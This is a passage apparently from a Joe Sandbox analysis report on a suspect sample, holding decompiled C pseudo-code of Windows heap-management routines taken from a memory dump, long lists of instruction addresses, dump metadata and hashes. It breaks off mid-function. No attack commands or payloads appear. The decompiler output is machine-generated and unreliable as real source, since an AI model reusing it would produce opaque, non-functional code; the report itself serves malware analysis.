										_v112 = _t464;
									}
									 *(_t405 + 8) = _v112;
									_t525 = _v116;
									asm("sbb eax, eax");
									 *(_t525 - 4) = _t426;
									_t417 = _v124;
									_t410 =  ~(_t499 & 1) & _t464;
									 *_t525 = _t410;
									_t525[3] = _t410;
									asm("sbb eax, eax");
									_t413 =  ~(_t499 & 8) & _t464;
									_t502 = _v148 + 1;
									_t525[1] = _t413;
									_t525[4] = _t413;
									_t435 =  *(_t417 + 4) & 0x0000ffff;
									_t505 = _t505 + ( *(_t505 + 2) & 0x0000ffff);
									_v116 =  &(_t525[6]);
									_t517 = _v164;
									_v148 = _t502;
									__eflags = _t502 - _t435;
									if(_t502 < _t435) {
										continue;
									} else {
										goto L31;
									}
								}
								__eflags = _t425 - 1;
								if(_t425 == 1) {
									goto L26;
								}
								__eflags = _t425 - 5;
								if(_t425 == 5) {
									goto L26;
								}
								__eflags = _t425 - 6;
								if(_t425 == 6) {
									goto L26;
								}
								_t463 =  *(_a20 + 0xc) | 0x01000000;
								goto L27;
							}
							goto L39;
						} else {
							_t466 = _v172;
							_t503 = 0xc0000017;
							goto L11;
						}
					}
					L7:
					 *_t517 =  *_t517 | 0x00001000;
					goto L89;
				}
				_push(_t504);
				if(E1D763770(_t417, _t504, _t517, _t532) != 0) {
					goto L5;
				}
				goto L4;
			}




















































































































                                                                                                                              0x1d7d7ce8
                                                                                                                              0x1d7d7cfa
                                                                                                                              0x1d7d7d00
                                                                                                                              0x1d7d7d02
                                                                                                                              0x1d7d7d05
                                                                                                                              0x1d7d7d0e
                                                                                                                              0x1d7d7d17
                                                                                                                              0x1d7d7d20
                                                                                                                              0x1d7d7d28
                                                                                                                              0x1d7d7d2b
                                                                                                                              0x1d7d7d31
                                                                                                                              0x1d7d7d37
                                                                                                                              0x1d7d7d43
                                                                                                                              0x1d7d7d49
                                                                                                                              0x1d7d7d59
                                                                                                                              0x1d7d7d5f
                                                                                                                              0x1d7d7d68
                                                                                                                              0x1d7d7d6d
                                                                                                                              0x1d7d7d71
                                                                                                                              0x1d7d7ea1
                                                                                                                              0x1d7d7eb1
                                                                                                                              0x1d7d7eb1
                                                                                                                              0x1d7d7d77
                                                                                                                              0x1d7d7d88
                                                                                                                              0x1d7d7d8d
                                                                                                                              0x1d7d7d91
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7d9d
                                                                                                                              0x1d7d7da3
                                                                                                                              0x1d7d7da9
                                                                                                                              0x1d7d7db0
                                                                                                                              0x1d7d7db3
                                                                                                                              0x1d7d7db5
                                                                                                                              0x1d7d7dcb
                                                                                                                              0x1d7d7dcb
                                                                                                                              0x1d7d7dcc
                                                                                                                              0x1d7d7dd1
                                                                                                                              0x1d7d7dd3
                                                                                                                              0x1d7d7dc1
                                                                                                                              0x1d7d7dc1
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7dc1
                                                                                                                              0x1d7d7dd5
                                                                                                                              0x1d7d7ddd
                                                                                                                              0x1d7d7de3
                                                                                                                              0x1d7d7dea
                                                                                                                              0x1d7d7e23
                                                                                                                              0x1d7d7e28
                                                                                                                              0x1d7d7e2b
                                                                                                                              0x1d7d7e2d
                                                                                                                              0x1d7d7e33
                                                                                                                              0x1d7d7e39
                                                                                                                              0x1d7d7e46
                                                                                                                              0x1d7d7e48
                                                                                                                              0x1d7d7e7e
                                                                                                                              0x1d7d7e7e
                                                                                                                              0x1d7d7e81
                                                                                                                              0x1d7d7e81
                                                                                                                              0x1d7d7e83
                                                                                                                              0x1d7d7e89
                                                                                                                              0x1d7d7e89
                                                                                                                              0x1d7d7e8e
                                                                                                                              0x1d7d7e94
                                                                                                                              0x1d7d7e96
                                                                                                                              0x1d7d7e9c
                                                                                                                              0x1d7d7e9c
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7e96
                                                                                                                              0x1d7d7e4e
                                                                                                                              0x1d7d7e67
                                                                                                                              0x1d7d7e69
                                                                                                                              0x1d7d7e6f
                                                                                                                              0x1d7d7e71
                                                                                                                              0x1d7d7eb4
                                                                                                                              0x1d7d7ebb
                                                                                                                              0x1d7d7ebe
                                                                                                                              0x1d7d7ec5
                                                                                                                              0x1d7d7ec7
                                                                                                                              0x1d7d7ecd
                                                                                                                              0x1d7d7ed1
                                                                                                                              0x1d7d7ed3
                                                                                                                              0x1d7d7eda
                                                                                                                              0x1d7d7fb8
                                                                                                                              0x1d7d7fb8
                                                                                                                              0x1d7d7fbe
                                                                                                                              0x1d7d7fc5
                                                                                                                              0x1d7d7fca
                                                                                                                              0x1d7d7fcd
                                                                                                                              0x1d7d7fd0
                                                                                                                              0x1d7d7fd4
                                                                                                                              0x1d7d819c
                                                                                                                              0x1d7d819e
                                                                                                                              0x1d7d81a1
                                                                                                                              0x1d7d81a4
                                                                                                                              0x1d7d81a6
                                                                                                                              0x1d7d81a9
                                                                                                                              0x1d7d81ac
                                                                                                                              0x1d7d81af
                                                                                                                              0x1d7d81b2
                                                                                                                              0x1d7d81b8
                                                                                                                              0x1d7d81ba
                                                                                                                              0x1d7d8235
                                                                                                                              0x1d7d8240
                                                                                                                              0x1d7d8247
                                                                                                                              0x1d7d828a
                                                                                                                              0x1d7d828c
                                                                                                                              0x1d7d828e
                                                                                                                              0x1d7d849a
                                                                                                                              0x1d7d849a
                                                                                                                              0x1d7d84a0
                                                                                                                              0x1d7d84a3
                                                                                                                              0x1d7d84a5
                                                                                                                              0x1d7d84ab
                                                                                                                              0x1d7d84ab
                                                                                                                              0x1d7d84b0
                                                                                                                              0x00000000
                                                                                                                              0x1d7d84b0
                                                                                                                              0x1d7d8294
                                                                                                                              0x1d7d829a
                                                                                                                              0x1d7d82b7
                                                                                                                              0x1d7d82bf
                                                                                                                              0x1d7d82c1
                                                                                                                              0x1d7d82c3
                                                                                                                              0x1d7d8482
                                                                                                                              0x1d7d8482
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8482
                                                                                                                              0x1d7d82c9
                                                                                                                              0x1d7d82cd
                                                                                                                              0x1d7d82cf
                                                                                                                              0x1d7d82d1
                                                                                                                              0x1d7d82d3
                                                                                                                              0x1d7d82d3
                                                                                                                              0x1d7d82e2
                                                                                                                              0x1d7d82e7
                                                                                                                              0x1d7d82e9
                                                                                                                              0x00000000
                                                                                                                              0x1d7d82ef
                                                                                                                              0x1d7d82f5
                                                                                                                              0x1d7d82f7
                                                                                                                              0x1d7d8301
                                                                                                                              0x1d7d8304
                                                                                                                              0x1d7d8307
                                                                                                                              0x1d7d830b
                                                                                                                              0x1d7d8410
                                                                                                                              0x1d7d8414
                                                                                                                              0x1d7d8423
                                                                                                                              0x1d7d842e
                                                                                                                              0x1d7d8431
                                                                                                                              0x1d7d8437
                                                                                                                              0x1d7d8437
                                                                                                                              0x1d7d8437
                                                                                                                              0x1d7d843b
                                                                                                                              0x1d7d843b
                                                                                                                              0x1d7d843e
                                                                                                                              0x1d7d843e
                                                                                                                              0x1d7d8440
                                                                                                                              0x1d7d8442
                                                                                                                              0x1d7d8447
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8449
                                                                                                                              0x1d7d844f
                                                                                                                              0x1d7d8451
                                                                                                                              0x1d7d8459
                                                                                                                              0x1d7d845e
                                                                                                                              0x1d7d845e
                                                                                                                              0x1d7d845e
                                                                                                                              0x1d7d8460
                                                                                                                              0x1d7d847a
                                                                                                                              0x1d7d847c
                                                                                                                              0x1d7d847e
                                                                                                                              0x1d7d8480
                                                                                                                              0x1d7d8490
                                                                                                                              0x1d7d8498
                                                                                                                              0x1d7d8498
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8480
                                                                                                                              0x1d7d8317
                                                                                                                              0x1d7d8319
                                                                                                                              0x1d7d8319
                                                                                                                              0x1d7d831c
                                                                                                                              0x1d7d831f
                                                                                                                              0x1d7d8322
                                                                                                                              0x1d7d8328
                                                                                                                              0x1d7d8328
                                                                                                                              0x1d7d832a
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8330
                                                                                                                              0x1d7d833d
                                                                                                                              0x1d7d8342
                                                                                                                              0x1d7d8346
                                                                                                                              0x1d7d834c
                                                                                                                              0x1d7d834f
                                                                                                                              0x1d7d8351
                                                                                                                              0x1d7d835d
                                                                                                                              0x1d7d8362
                                                                                                                              0x1d7d836b
                                                                                                                              0x1d7d8371
                                                                                                                              0x1d7d8378
                                                                                                                              0x1d7d8378
                                                                                                                              0x1d7d837a
                                                                                                                              0x1d7d83c4
                                                                                                                              0x1d7d83c4
                                                                                                                              0x1d7d83c4
                                                                                                                              0x1d7d83c4
                                                                                                                              0x1d7d83c7
                                                                                                                              0x1d7d83ca
                                                                                                                              0x1d7d83cd
                                                                                                                              0x1d7d83d3
                                                                                                                              0x00000000
                                                                                                                              0x1d7d83d3
                                                                                                                              0x1d7d837c
                                                                                                                              0x1d7d8382
                                                                                                                              0x1d7d8382
                                                                                                                              0x1d7d8388
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d838a
                                                                                                                              0x1d7d838d
                                                                                                                              0x1d7d8398
                                                                                                                              0x1d7d839f
                                                                                                                              0x1d7d83a4
                                                                                                                              0x1d7d83aa
                                                                                                                              0x1d7d83b0
                                                                                                                              0x1d7d83b2
                                                                                                                              0x1d7d83b4
                                                                                                                              0x1d7d83b9
                                                                                                                              0x1d7d83b9
                                                                                                                              0x1d7d83b9
                                                                                                                              0x1d7d83b2
                                                                                                                              0x1d7d83bb
                                                                                                                              0x1d7d83bd
                                                                                                                              0x1d7d83bd
                                                                                                                              0x1d7d83c1
                                                                                                                              0x00000000
                                                                                                                              0x1d7d83d9
                                                                                                                              0x1d7d83dc
                                                                                                                              0x1d7d83dd
                                                                                                                              0x1d7d83e4
                                                                                                                              0x1d7d83e6
                                                                                                                              0x1d7d83f0
                                                                                                                              0x1d7d83f2
                                                                                                                              0x1d7d83f8
                                                                                                                              0x1d7d83f8
                                                                                                                              0x1d7d8401
                                                                                                                              0x1d7d8407
                                                                                                                              0x1d7d840a
                                                                                                                              0x00000000
                                                                                                                              0x1d7d840a
                                                                                                                              0x1d7d82e9
                                                                                                                              0x1d7d81c2
                                                                                                                              0x1d7d81c2
                                                                                                                              0x1d7d81c5
                                                                                                                              0x1d7d81cb
                                                                                                                              0x1d7d81d0
                                                                                                                              0x1d7d81d6
                                                                                                                              0x1d7d81f5
                                                                                                                              0x1d7d81f9
                                                                                                                              0x1d7d81fc
                                                                                                                              0x1d7d81ff
                                                                                                                              0x1d7d8201
                                                                                                                              0x1d7d820c
                                                                                                                              0x1d7d820c
                                                                                                                              0x1d7d8210
                                                                                                                              0x1d7d8212
                                                                                                                              0x1d7d821e
                                                                                                                              0x1d7d821e
                                                                                                                              0x00000000
                                                                                                                              0x1d7d821e
                                                                                                                              0x1d7d8214
                                                                                                                              0x1d7d8218
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8218
                                                                                                                              0x1d7d8203
                                                                                                                              0x1d7d8206
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8206
                                                                                                                              0x1d7d81d8
                                                                                                                              0x1d7d81da
                                                                                                                              0x1d7d81dc
                                                                                                                              0x1d7d81dc
                                                                                                                              0x1d7d81e0
                                                                                                                              0x1d7d81e2
                                                                                                                              0x1d7d81e4
                                                                                                                              0x1d7d81e4
                                                                                                                              0x1d7d81e7
                                                                                                                              0x1d7d8221
                                                                                                                              0x1d7d8221
                                                                                                                              0x1d7d8225
                                                                                                                              0x1d7d8228
                                                                                                                              0x1d7d822b
                                                                                                                              0x1d7d822d
                                                                                                                              0x1d7d822d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7fda
                                                                                                                              0x1d7d7fda
                                                                                                                              0x1d7d7fda
                                                                                                                              0x1d7d7fdc
                                                                                                                              0x1d7d7fdf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7fe1
                                                                                                                              0x1d7d7fe4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7fec
                                                                                                                              0x1d7d7ff3
                                                                                                                              0x1d7d7ff8
                                                                                                                              0x1d7d7ffa
                                                                                                                              0x1d7d8024
                                                                                                                              0x1d7d8027
                                                                                                                              0x1d7d802a
                                                                                                                              0x1d7d802a
                                                                                                                              0x1d7d802d
                                                                                                                              0x1d7d802f
                                                                                                                              0x1d7d81ed
                                                                                                                              0x1d7d81ed
                                                                                                                              0x1d7d8170
                                                                                                                              0x1d7d817a
                                                                                                                              0x1d7d817c
                                                                                                                              0x1d7d8182
                                                                                                                              0x1d7d8183
                                                                                                                              0x1d7d8189
                                                                                                                              0x1d7d8190
                                                                                                                              0x1d7d8192
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8198
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8198
                                                                                                                              0x1d7d8043
                                                                                                                              0x1d7d8043
                                                                                                                              0x1d7d8045
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8056
                                                                                                                              0x1d7d805a
                                                                                                                              0x1d7d8061
                                                                                                                              0x1d7d8067
                                                                                                                              0x1d7d806a
                                                                                                                              0x1d7d806d
                                                                                                                              0x1d7d8072
                                                                                                                              0x1d7d8079
                                                                                                                              0x1d7d807f
                                                                                                                              0x1d7d8082
                                                                                                                              0x1d7d8084
                                                                                                                              0x1d7d808b
                                                                                                                              0x1d7d808f
                                                                                                                              0x1d7d8095
                                                                                                                              0x1d7d8097
                                                                                                                              0x1d7d809b
                                                                                                                              0x1d7d80a1
                                                                                                                              0x1d7d80a7
                                                                                                                              0x1d7d80ad
                                                                                                                              0x1d7d8161
                                                                                                                              0x1d7d8164
                                                                                                                              0x1d7d8167
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d816d
                                                                                                                              0x00000000
                                                                                                                              0x1d7d816d
                                                                                                                              0x1d7d80b9
                                                                                                                              0x1d7d80c2
                                                                                                                              0x1d7d80c2
                                                                                                                              0x1d7d80c5
                                                                                                                              0x1d7d80c8
                                                                                                                              0x1d7d80cb
                                                                                                                              0x1d7d80d1
                                                                                                                              0x1d7d80e1
                                                                                                                              0x1d7d80e6
                                                                                                                              0x1d7d80ec
                                                                                                                              0x1d7d80ee
                                                                                                                              0x1d7d80f5
                                                                                                                              0x1d7d80fc
                                                                                                                              0x1d7d8104
                                                                                                                              0x1d7d810f
                                                                                                                              0x1d7d8119
                                                                                                                              0x1d7d8124
                                                                                                                              0x1d7d8124
                                                                                                                              0x1d7d8124
                                                                                                                              0x1d7d8124
                                                                                                                              0x1d7d8130
                                                                                                                              0x1d7d8136
                                                                                                                              0x1d7d8137
                                                                                                                              0x1d7d813d
                                                                                                                              0x1d7d8147
                                                                                                                              0x1d7d814d
                                                                                                                              0x1d7d8153
                                                                                                                              0x1d7d8153
                                                                                                                              0x1d7d815b
                                                                                                                              0x00000000
                                                                                                                              0x1d7d815b
                                                                                                                              0x1d7d7ffc
                                                                                                                              0x1d7d7fff
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8001
                                                                                                                              0x1d7d8004
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8006
                                                                                                                              0x1d7d8009
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8011
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8011
                                                                                                                              0x1d7d8019
                                                                                                                              0x1d7d8019
                                                                                                                              0x00000000
                                                                                                                              0x1d7d8019
                                                                                                                              0x1d7d7ee0
                                                                                                                              0x1d7d7ee3
                                                                                                                              0x1d7d7ee6
                                                                                                                              0x1d7d7ee6
                                                                                                                              0x1d7d7ee8
                                                                                                                              0x1d7d7eeb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7ef1
                                                                                                                              0x1d7d7ef4
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7f00
                                                                                                                              0x1d7d7f07
                                                                                                                              0x1d7d7f0c
                                                                                                                              0x1d7d7f0e
                                                                                                                              0x1d7d7f2d
                                                                                                                              0x1d7d7f30
                                                                                                                              0x1d7d7f33
                                                                                                                              0x1d7d7f37
                                                                                                                              0x1d7d7f44
                                                                                                                              0x1d7d7f46
                                                                                                                              0x1d7d7f49
                                                                                                                              0x1d7d7f4c
                                                                                                                              0x1d7d7f55
                                                                                                                              0x1d7d7f57
                                                                                                                              0x1d7d7f57
                                                                                                                              0x1d7d7f57
                                                                                                                              0x1d7d7f4e
                                                                                                                              0x1d7d7f4e
                                                                                                                              0x1d7d7f50
                                                                                                                              0x1d7d7f50
                                                                                                                              0x1d7d7f5d
                                                                                                                              0x1d7d7f62
                                                                                                                              0x1d7d7f6c
                                                                                                                              0x1d7d7f6e
                                                                                                                              0x1d7d7f71
                                                                                                                              0x1d7d7f74
                                                                                                                              0x1d7d7f76
                                                                                                                              0x1d7d7f7b
                                                                                                                              0x1d7d7f89
                                                                                                                              0x1d7d7f8b
                                                                                                                              0x1d7d7f8d
                                                                                                                              0x1d7d7f8e
                                                                                                                              0x1d7d7f91
                                                                                                                              0x1d7d7f9b
                                                                                                                              0x1d7d7f9f
                                                                                                                              0x1d7d7fa1
                                                                                                                              0x1d7d7fa4
                                                                                                                              0x1d7d7faa
                                                                                                                              0x1d7d7fb0
                                                                                                                              0x1d7d7fb2
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7fb2
                                                                                                                              0x1d7d7f10
                                                                                                                              0x1d7d7f13
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7f15
                                                                                                                              0x1d7d7f18
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7f1a
                                                                                                                              0x1d7d7f1d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7f25
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7f25
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7e73
                                                                                                                              0x1d7d7e73
                                                                                                                              0x1d7d7e79
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7e79
                                                                                                                              0x1d7d7e71
                                                                                                                              0x1d7d7e3b
                                                                                                                              0x1d7d7e3b
                                                                                                                              0x00000000
                                                                                                                              0x1d7d7e3b
                                                                                                                              0x1d7d7db7
                                                                                                                              0x1d7d7dbf
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000

                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID:
                                                                                                                              • API String ID:
                                                                                                                              • Opcode ID: a47bc2382f2c78deb6084073382d8db1e290fb547d0deb2939bde831d6799bf8
                                                                                                                              • Instruction ID: e7b02f03f7d3f9352feccb6a9543337322d5a43847e94aa2d67e6a02a0b49deb
                                                                                                                              • Opcode Fuzzy Hash: a47bc2382f2c78deb6084073382d8db1e290fb547d0deb2939bde831d6799bf8
                                                                                                                              • Instruction Fuzzy Hash: AF426B75A007198FDB64CF68C881BADB7F5BF48320F15809AE94DEB241D738A985CF61
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D8018DA Relevance: .6, Instructions: 559COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 70%
                                                                                                                              			E1D8018DA(intOrPtr __ecx) {
				char _v8;
				signed int _v12;
				signed int _v16;
				intOrPtr _v20;
				signed int* _v24;
				signed int _v28;
				intOrPtr _v32;
				signed int _v36;
				signed int _v40;
				signed char _v44;
				char _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				intOrPtr* _v64;
				void* __ebx;
				char* _t197;
				signed int _t201;
				unsigned int _t209;
				char* _t223;
				signed int* _t227;
				signed int _t235;
				signed int _t246;
				signed int _t249;
				intOrPtr* _t250;
				signed int _t255;
				signed int _t256;
				signed int _t259;
				signed short _t264;
				signed int _t272;
				signed int _t280;
				signed int _t286;
				signed char _t300;
				signed int _t302;
				signed char _t303;
				intOrPtr _t305;
				unsigned int _t306;
				signed int _t307;
				signed char* _t309;
				signed int _t315;
				intOrPtr _t316;
				signed char* _t319;
				void* _t320;
				signed int _t321;
				signed char _t324;
				signed int _t325;
				signed int _t333;
				unsigned int _t345;
				void* _t346;
				signed int _t348;
				signed int _t361;
				void* _t364;
				intOrPtr _t368;
				signed int _t382;
				char _t390;
				intOrPtr _t393;
				unsigned int _t400;
				signed int _t405;
				signed int _t406;
				signed int _t411;
				void* _t412;
				signed char _t414;
				intOrPtr* _t415;
				void* _t417;
				void* _t418;
				intOrPtr _t419;
				intOrPtr _t421;
				signed int _t424;
				signed char _t426;
				intOrPtr* _t427;
				void* _t429;
				intOrPtr* _t432;
				intOrPtr _t435;
				intOrPtr* _t436;
				intOrPtr* _t438;
				intOrPtr* _t443;
				signed int _t447;
				intOrPtr* _t449;
				void* _t450;
				signed int _t454;
				signed int _t455;
				intOrPtr* _t456;
				void* _t457;
				intOrPtr* _t460;
				intOrPtr _t461;
				void* _t462;
				signed int _t463;

				_t302 = 0;
				_t435 = __ecx;
				_v36 = 0;
				_t405 = 0;
				_v32 = __ecx;
				_v40 = 0;
				_t324 = 1;
				do {
					if((_t324 &  *(_t435 + 0x1bf + _t405 * 4)) != 0) {
						if(( *(_t435 + 0x1b8) & _t324) != 0) {
							goto L2;
						}
						_t300 =  *0x1d834360; // 0x10
						_v44 = _t300;
						if(_t300 == 0) {
							goto L100;
						}
						L5:
						_t325 = _t302;
						_v60 = _t302;
						do {
							if(_t325 != 0) {
								_t447 = _t325 * 0x68;
								_t325 = _v60;
								_t449 = _t447 + 0xffffff98 +  *((intOrPtr*)(_t435 + 0x5c4 + _t405 * 4));
							} else {
								_t449 =  *((intOrPtr*)(_t435 + 0x3c0 + _t405 * 4));
							}
							if(_t449 != 0 &&  *((intOrPtr*)(_t449 + 0x54)) == 1) {
								_t209 = E1D80124C(_t449, _t325);
								_t306 = _t209;
								if(_t306 == 0) {
									_t302 = 0;
									L97:
									_t405 = _v40;
									_t325 = _v60;
									goto L98;
								}
								 *((intOrPtr*)( *_t449 + 0x14)) = 0;
								_t410 =  *(_t435 + 0xc);
								_t345 = _t306 >> 0x00000003 ^  *0x1d836964 ^  *(_t435 + 0xc) ^  *_t306;
								if(_t345 != 0) {
									L92:
									_push(0);
									_push(0);
									_push(0);
									L93:
									_push(_t306);
									_t346 = 3;
									E1D805FED(_t346, _t410);
									L94:
									_t302 = 0;
									L95:
									_t435 = _v32;
									goto L97;
								}
								_t438 =  *((intOrPtr*)(_t209 - (_t345 >> 0xd)));
								_v64 = _t438;
								if(_t438 == 0) {
									goto L92;
								}
								_t348 =  *(_t438 + 4);
								_t411 =  *(_t306 + 4) >> 0x00000008 & 0x0000ffff;
								_v48 = 0;
								_v56 = _t348;
								_v52 = _t411;
								_t454 =  *( *((intOrPtr*)( *_t438)) + 0xc);
								if((( *(_t348 + 0x10) ^ _t454 ^  *0x1d836964 ^ _t348) & 0x0000ffff) + (( *(_t348 + 0x10) ^ _t454 ^  *0x1d836964 ^ _t348) >> 0x10) * _t411 + _v56 == _t306) {
									if(E1D753C40() == 0) {
										_t223 = 0x7ffe0380;
									} else {
										_t223 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
									}
									if( *_t223 != 0 && ( *( *[fs:0x30] + 0x240) & 1) != 0) {
										_t40 = _t306 + 8; // 0x8
										E1D7FF247( *(_t454 + 0xc), _t40, 2);
									}
									asm("sbb eax, eax");
									_v20 = 0;
									_t412 = 0;
									_t42 = _t438 + 0x10; // 0x10
									_t227 = _t42;
									_v24 = _t227;
									while(1) {
										_t455 =  *_t227;
										_v28 = _t455;
										if((_t455 >> 0x00000010 & 0x00008000) != 0) {
											goto L26;
										}
										L25:
										asm("lock cmpxchg [edi], ecx");
										_t438 = _v64;
										if(_t455 == _t455) {
											L28:
											 *((char*)(_t306 + 7)) = 0x80;
											if(_t455 != 0xffffffff) {
												_t307 = _v52;
												asm("btr [eax], ebx");
												if( *((intOrPtr*)(_t438 + 0xc)) == 0) {
													L36:
													_t456 =  *_t438;
													_t235 = (_t455 & 0x0000ffff) + _v48 + 0x00000001 | _t307 << 0x00000010;
													if(_t235 !=  *(_t438 + 0x18)) {
														L74:
														_t138 = _t438 + 0x1c; // 0x1c
														_t309 = _t138;
														 *(_t438 + 0x10) = _t235;
														if(( *_t309 & 0x00000002) == 0 && E1D753AF6(_t456, _t438) != 0) {
															while(1) {
																_t414 =  *_t309;
																if(_t414 == 0 || (_t414 & 0x00000002) != 0) {
																	goto L94;
																}
																asm("lock cmpxchg [ebx], ecx");
																if(_t414 != _t414) {
																	continue;
																}
																_t361 =  *_t438;
																_v28 = _t361;
																_t457 = 0;
																do {
																	_t415 =  *((intOrPtr*)(_t361 + ((( *(_t361 + 0x5e) & 0x0000ffff) + _t457 & 0x0000000f) + 2) * 4));
																	if(_t415 != 0) {
																		if(( *(_t415 + 0x1c) & 0x00000001) != 0) {
																			goto L86;
																		}
																		asm("lock cmpxchg [ebx], ecx");
																		if(_t415 == _t415) {
																			_t315 = 0xfffffffd;
																			_t246 =  *(_t415 + 0x1c);
																			do {
																				asm("lock cmpxchg [esi], ecx");
																			} while ((_t246 & _t315) != 0);
																			_t302 = 0;
																			if(_t246 != 2) {
																				goto L95;
																			}
																			_t368 =  *((intOrPtr*)( *_t415));
																			 *_t415 = 0;
																			_t418 = _t415 + 0x20;
																			L69:
																			E1D7520E0(_t368, _t418);
																			goto L95;
																		}
																		L85:
																		_t361 = _v28;
																		goto L86;
																	}
																	asm("lock cmpxchg [ebx], ecx");
																	if(0 == 0) {
																		goto L94;
																	}
																	goto L85;
																	L86:
																	_t457 = _t457 + 1;
																} while (_t457 < 0x10);
																_t157 = _t438 + 0x20; // 0x20
																_t417 = _t157;
																_t364 =  *((intOrPtr*)( *( *((intOrPtr*)( *_t438)) + 0xc) + 0x3c0 + ( *( *_t438 + 0x5c) & 0x0000ffff) * 4)) + 0x48;
																L30:
																E1D7520E0(_t364, _t417);
																goto L94;
															}
														}
														goto L94;
													}
													_t316 =  *((intOrPtr*)(_t456 + 0x58));
													_t419 =  *((intOrPtr*)( *_t456 + 0x10));
													if( *((intOrPtr*)(_t456 + 0x54)) != 1 || _t419 < _t316 || _t419 - _t316 >=  *((intOrPtr*)( *_t456 + 0x14))) {
														_t249 =  *_t438;
														_v52 = _t249;
														_t250 = _t249 + 4;
														_t460 =  *_t250;
														 *_t250 = 0;
														if(_t460 == 0) {
															L60:
															_t461 =  *_t438;
															_t317 =  *( *_v52 + 0xc);
															_v24 =  *( *_v52 + 0xc);
															if(( *(_t438 + 0x16) & 0x00000003) != 0) {
																_v12 =  *(_t438 + 4) + 0x0000101f & 0xfffff000;
																_t264 = E1D800E2D(_t438);
																_push( &_v8);
																_t382 = ( *(_t438 + 0x18) & 0x0000ffff) * (_t264 & 0x0000ffff) << 3;
																_v16 = _t382;
																_push(_t382);
																_push(E1D73F0E1(_t317[3], 1));
																_push( &_v16);
																_push( &_v12);
																_push(0xffffffff);
																E1D782EB0();
															}
															 *((intOrPtr*)( *(_t438 + 4) + 0xc)) = 0;
															E1D75252B(_t317,  *(_t438 + 4), 0);
															_t255 =  *(_t438 + 0x18) & 0x0000ffff;
															_v52 = _t255;
															_t120 = _t461 + 0x50; // 0x50
															_t256 = _t120;
															_v52 =  ~_t255;
															_v56 = _t256;
															do {
																_t462 =  *_t256;
																_t421 =  *((intOrPtr*)(_t256 + 4));
																_v20 = _t421;
																asm("lock cmpxchg8b [edi]");
																_t256 = _v52;
															} while (_t462 != _t462 || _t421 != _v20);
															_t443 = _v64;
															_t302 = 0;
															 *((intOrPtr*)(_t443 + 4)) = 0;
															asm("lock inc dword [eax+0x20]");
															 *((intOrPtr*)(_t443 + 0x10)) = 0;
															_t135 = _t443 + 0x1c; // 0x1c
															_t463 = 0xfffffffe;
															_t259 =  *_t135;
															do {
																asm("lock cmpxchg [edx], ecx");
															} while ((_t259 & _t463) != 0);
															if(_t259 != 1) {
																goto L95;
															}
															_t136 = _t443 + 0x20; // 0x20
															_t418 = _t136;
															_t368 =  *((intOrPtr*)( *_t443));
															 *_t443 = 0;
															goto L69;
														}
														_t77 = _t460 + 0x1c; // 0x1c
														_t319 = _t77;
														_t424 = 0xfffffff9;
														_t272 =  *_t319;
														do {
															asm("lock cmpxchg [ebx], ecx");
														} while ((_t272 & _t424) != 0);
														if(_t272 != 6) {
															if(E1D753AF6(_v52, _t460) == 0) {
																goto L60;
															} else {
																goto L46;
															}
															while(1) {
																L46:
																_t426 =  *_t319;
																if(_t426 == 0 || (_t426 & 0x00000002) != 0) {
																	goto L60;
																}
																asm("lock cmpxchg [ebx], ecx");
